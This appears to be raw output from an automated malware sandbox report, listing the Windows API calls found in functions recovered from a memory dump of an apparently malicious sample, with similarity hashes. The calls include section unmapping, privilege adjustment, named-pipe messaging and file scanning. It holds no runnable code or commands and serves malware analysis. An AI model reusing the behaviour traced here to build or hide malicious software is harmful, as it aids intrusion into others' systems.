    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
